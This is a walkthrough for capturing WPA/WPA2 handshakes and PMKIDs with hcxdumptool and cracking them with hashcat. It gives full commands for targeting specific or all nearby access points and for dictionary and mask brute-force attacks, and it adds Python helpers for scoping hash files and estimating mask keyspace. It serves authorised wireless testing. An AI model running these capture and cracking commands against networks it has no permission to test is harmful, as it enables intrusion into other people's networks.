This is a walkthrough for obtaining wireless handshakes and PMKIDs with hcxdumptool and hcxtools, and cracking them with Hashcat.


This is for educational purposes and is only to be performed on networks you have permission to test.


My notes on Wireless in general can be found here.

My notes on Hashcat can be found here.

This will require a WiFi adapter that supports monitor mode and packet injection.

I myself have and recommend these adapters:

HCXDumptool

Find your interface. If you have one network card (capable of monitor mode/packet injection) it will be wlan0, but if you have a second wireless USB dongle, it will most likely be wlan1.

iwconfig

Put the interface into monitor mode

sudo airmon-ng start wlan1

This may depend on which version you have installed, e.g. v6.2.9 has a different interface than v6.3.0+. I'll be going with the most up-to-date version (currently v6.3.5).

This attack is not guaranteed! Not all access points (APs) are vulnerable to the PMKID attack, BUT this can still obtain EAPOL M1M2M3 or EAPOL M1M2M3M4 handshakes for us.

Info on PMKID on Hashcat Forums

HCXDumptool v6.2.9

hcxdumptool -o (name).pcapng -i (interface) --enable_status=1 --filterlist_ap=target.txt --filtermode=2

Once we obtain our PMKID we will see it at the bottom of the output.

We MAY see PMKID:XXXXXXXXXXXXXXX OR PMKIDROGUE:XXXXXXXXXXXXXXX, and potentially even M1M2ROGUE:XXXXXXXXXXXXXXX.

  • PMKID:XXXXXXXXXXXXXXX KDV:2 means you captured a PMKID requested by a CLIENT. The WPA version (Key Descriptor Version) is WPA2. You can recover the password from this.
  • PMKIDROGUE:XXXXXXXXXXXXXXX KDV:2 means the PMKID was requested by hcxdumptool and not by a CLIENT. You can recover the password from this.
  • M1M2ROGUE: the EAPOL M2 was requested from a CLIENT by hcxdumptool and not by an ACCESS POINT. You can recover the password from this.

HCXDumptool v6.3.0+ (currently v6.3.5 as of writing this)

To target AP(s), we scan for target(s) with airodump-ng

sudo airodump-ng wlan1mon

Grab the BSSID(s) of our targets and put them in a Berkeley Packet Filter (BPF) .bpf file, using either tcpdump OR hcxdumptool.

TCPDump

tcpdump -s 65535 -y IEEE802_11_RADIO wlan addr3 BSSID -ddd > SSID.bpf

HCXDumptool

hcxdumptool --bpfc="wlan addr3 BSSID" > SSID.bpf

** NOTE: We can target multiple APs

TCPDump:

tcpdump -s 65535 -y IEEE802_11_RADIO wlan addr3 BSSID or wlan addr3 BSSID2 -ddd > SSID.bpf

HCXDumptool:

hcxdumptool --bpfc="wlan addr3 BSSID1 or wlan addr3 BSSID2" > SSID.bpf

Now run it against our target

sudo hcxdumptool --rds=1 -F --bpf=SSID.bpf -i wlan1mon -w outfile.pcapng

To target all APs around (not recommended without permission)

sudo hcxdumptool -i wlan1mon -w outfile.pcapng

After a while we may see a + under the 3 or P column of our target. Either can be used to obtain the password with hashcat.

Hash Cracking

So we now have our handshake in .cap or .pcapng format, and we can crack the hash to find out the password.

Hashcat

We have our PMKID in the .pcapng format and we can use hashcat to crack it. First we must convert it with the hcxpcapngtool utility from hcxtools.

sudo hcxpcapngtool -o SSIDHash outfile.cap (or .pcapng)
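The file hcxpcapngtool writes is hashcat's -m 22000 text format, one hash per line. The following added Python example (not from the walkthrough, hcxtools or hashcat) parses that format and inventories which ESSIDs have PMKID entries and which have EAPOL entries, which is the check I run on an authorized capture to confirm it contains only in-scope networks before any cracking starts. It assumes hashcat's documented field layout WPA*TYPE*PMKID/MIC*MAC_AP*MAC_STA*ESSID*ANONCE*EAPOL*MESSAGEPAIR; the sample lines are constructed, not from a real capture.

```python
"""Inventory the hashes in a hashcat -m 22000 file (the format hcxpcapngtool writes).

Added example, not part of the original walkthrough or the hcxtools/hashcat projects.
Field layout assumed from hashcat's documented 22000 format:
    WPA*TYPE*PMKID-or-MIC*MAC_AP*MAC_STA*ESSID(hex)*ANONCE*EAPOL*MESSAGEPAIR
TYPE 01 = PMKID line (last three fields empty), TYPE 02 = EAPOL 4-way handshake line.
"""
from collections import Counter
from dataclasses import dataclass
from typing import Dict, Iterable, Optional

# Constructed sample lines (NOT a real capture): a PMKID and an EAPOL entry for the
# ESSID "TestNet" (hex 546573744e6574) plus a PMKID entry for "Other" (hex 4f74686572).
SAMPLE_22000 = [
    "WPA*01*0123456789abcdef0123456789abcdef*aabbccddeeff*112233445566*546573744e6574***",
    "WPA*02*fedcba9876543210fedcba9876543210*aabbccddeeff*112233445566*546573744e6574*"
    + "ff" * 32
    + "*0103005f02030a0000000000000000000100*02",
    "WPA*01*00112233445566778899aabbccddeeff*66778899aabb*c0ffeec0ffee*4f74686572***",
]

# Low three bits of MESSAGEPAIR, as documented by hashcat for hccapx/22000.
# The higher bits carry capture-quality flags that are kept raw here, not decoded.
PAIR_NAMES = {0: "M1+M2", 1: "M1+M4", 2: "M2+M3", 3: "M2+M3", 4: "M3+M4", 5: "M3+M4"}


@dataclass(frozen=True)
class WpaHash:
    kind: str                    # "PMKID" or "EAPOL"
    essid: str
    mac_ap: str
    mac_sta: str
    message_pair: Optional[int]  # pair index for EAPOL lines, None for PMKID lines
    flags: int                   # raw MESSAGEPAIR byte (0 for PMKID lines)


def _is_hex(value: str) -> bool:
    """True for a non-empty, even-length string of hex digits."""
    return bool(value) and len(value) % 2 == 0 and all(c in "0123456789abcdefABCDEF" for c in value)


def parse_22000_line(line: str) -> WpaHash:
    """Parse one 22000 line, validating field widths so corrupt lines are rejected."""
    fields = line.strip().split("*")
    if len(fields) != 9 or fields[0] != "WPA":
        raise ValueError(f"not a 22000 line: {line!r}")
    _, type_code, key, mac_ap, mac_sta, essid_hex, anonce, eapol, mp = fields
    for name, value, width in (("PMKID/MIC", key, 32), ("MAC_AP", mac_ap, 12), ("MAC_STA", mac_sta, 12)):
        if len(value) != width or not _is_hex(value):
            raise ValueError(f"bad {name} field in {line!r}")
    if not _is_hex(essid_hex):
        raise ValueError(f"bad ESSID field in {line!r}")
    essid = bytes.fromhex(essid_hex).decode("utf-8", errors="replace")
    if type_code == "01":
        if anonce or eapol or mp:
            raise ValueError(f"PMKID line must have empty trailing fields: {line!r}")
        return WpaHash("PMKID", essid, mac_ap, mac_sta, None, 0)
    if type_code == "02":
        if len(anonce) != 64 or not _is_hex(anonce) or not _is_hex(eapol) or not _is_hex(mp):
            raise ValueError(f"bad EAPOL fields in {line!r}")
        flags = int(mp, 16)
        return WpaHash("EAPOL", essid, mac_ap, mac_sta, flags & 0x07, flags)
    raise ValueError(f"unknown 22000 type {type_code!r}")


def inventory(lines: Iterable[str]) -> Dict[str, Counter]:
    """Per ESSID, count how many PMKID and EAPOL entries the file contains."""
    summary: Dict[str, Counter] = {}
    for line in lines:
        if not line.strip():
            continue
        h = parse_22000_line(line)
        summary.setdefault(h.essid, Counter())[h.kind] += 1
    return summary


if __name__ == "__main__":
    for essid, counts in inventory(SAMPLE_22000).items():
        print(f"{essid!r}: {counts['PMKID']} PMKID, {counts['EAPOL']} EAPOL")
    h = parse_22000_line(SAMPLE_22000[1])
    print(f"EAPOL entry for {h.essid!r} is pair {PAIR_NAMES[h.message_pair]} (flags 0x{h.flags:02x})")
```

Run it over the real SSIDHash file by replacing SAMPLE_22000 with the file's lines; any ESSID that is not on the authorization list should be removed from the file before hashcat ever sees it.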

Dictionary

If we want to use a dictionary attack, using rockyou.txt for example

sudo hashcat -m 22000 SSIDHash wordlist

Depending on your hardware, the dictionary you chose, and the password, this may take some time. You can press S for a status update to see the estimated time to finish, as well as the updated "Recovered.Total" count of recovered keys.

We can run the same command again with --show appended to the end to see our cracked passwords.

Brute Force

If we wanted to run a brute-force attack rather than a dictionary attack, it's a similar command

hashcat -a 3 -w 3 -m 22000 (hash file) '?l?l?l?l?l?l?l'

Replace the ?l with whatever mask we deem fit.

* ?l = a-z
* ?u = A-Z
* ?d = 0-9
* ?h = 0-9a-f
* ?H = 0-9A-F
* ?s = space and !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
* ?a = ?l?u?d?s
* ?b = 0x00 - 0xff
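To judge whether a mask is even worth running, I want its keyspace and the resulting runtime at a given rate, and I want to know whether the candidates it produces can be valid WPA passphrases at all (WPA-PSK passphrases are 8 to 63 characters, so a 7-position mask like the one above can never match one). The following added Python example, not from the walkthrough or from hashcat, parses a mask using the built-in charsets listed above and computes those numbers; the 500 kH/s rate in the demo is a made-up figure, and hashcat's custom charsets (?1 to ?4) are not modelled.

```python
"""Keyspace, length check and runtime estimate for a hashcat brute-force mask.

Added example; not from the walkthrough or from hashcat itself. Charset contents
follow hashcat's built-in ?l ?u ?d ?h ?H ?s ?a ?b definitions. Custom charsets
(?1..?4) are not modelled. The hash rate is whatever the caller assumes for
their hardware; the 500 kH/s used in the demo below is a made-up figure.
"""
from math import prod
from typing import List, Tuple

BUILTIN_CHARSETS = {
    "l": "abcdefghijklmnopqrstuvwxyz",
    "u": "ABCDEFGHIJKLMNOPQRSTUVWXYZ",
    "d": "0123456789",
    "h": "0123456789abcdef",
    "H": "0123456789ABCDEF",
    # space plus the 32 ASCII punctuation characters
    "s": " !\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~",
}
BUILTIN_CHARSETS["a"] = "".join(BUILTIN_CHARSETS[k] for k in "luds")  # 95 printable ASCII
BYTE_RANGE = 256  # ?b = 0x00..0xff

WPA_PSK_MIN_LEN = 8   # WPA-PSK passphrase length limits (IEEE 802.11i)
WPA_PSK_MAX_LEN = 63


def parse_mask(mask: str) -> List[Tuple[str, int]]:
    """Split a mask into (token, charset_size) per output position.

    Literal characters contribute exactly one candidate; '??' is a literal '?'.
    """
    positions: List[Tuple[str, int]] = []
    i = 0
    while i < len(mask):
        ch = mask[i]
        if ch != "?":
            positions.append((ch, 1))
            i += 1
            continue
        if i + 1 >= len(mask):
            raise ValueError("mask ends with a dangling '?'")
        key = mask[i + 1]
        if key == "?":
            positions.append(("?", 1))
        elif key == "b":
            positions.append(("?b", BYTE_RANGE))
        elif key in BUILTIN_CHARSETS:
            positions.append(("?" + key, len(BUILTIN_CHARSETS[key])))
        else:
            raise ValueError(f"unknown charset ?{key}")
        i += 2
    return positions


def keyspace(mask: str) -> int:
    """Number of candidates the mask generates (product of per-position sizes)."""
    return prod(size for _, size in parse_mask(mask))


def password_length(mask: str) -> int:
    """Length of every candidate the mask produces."""
    return len(parse_mask(mask))


def wpa_psk_length_ok(mask: str) -> bool:
    """False if no candidate from this mask can be a valid WPA-PSK passphrase."""
    return WPA_PSK_MIN_LEN <= password_length(mask) <= WPA_PSK_MAX_LEN


def estimate_seconds(mask: str, hashes_per_second: float) -> float:
    """Worst-case time to exhaust the mask at the given (assumed) rate."""
    return keyspace(mask) / hashes_per_second


if __name__ == "__main__":
    rate = 500_000  # made-up rate, hashes per second
    for mask in ("?l?l?l?l?l?l?l", "?l?l?l?l?l?l?l?l", "?d?d?d?d?d?d?d?d?d?d", "Summer?d?d?d?d!"):
        hours = estimate_seconds(mask, rate) / 3600
        print(f"{mask:22} len={password_length(mask):2} keyspace={keyspace(mask):,} "
              f"wpa_len_ok={wpa_psk_length_ok(mask)} ~{hours:,.1f} h at {rate:,} H/s")
```

The output is the argument for a password policy rather than a cracking plan: an all-lowercase 8-character passphrase has a keyspace of about 2 x 10^11, whereas one more position or a mixed ?a charset pushes the worst-case time from hours into years at the same rate.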

This covers the basics of hash cracking with hashcat, but it can get much more advanced than this.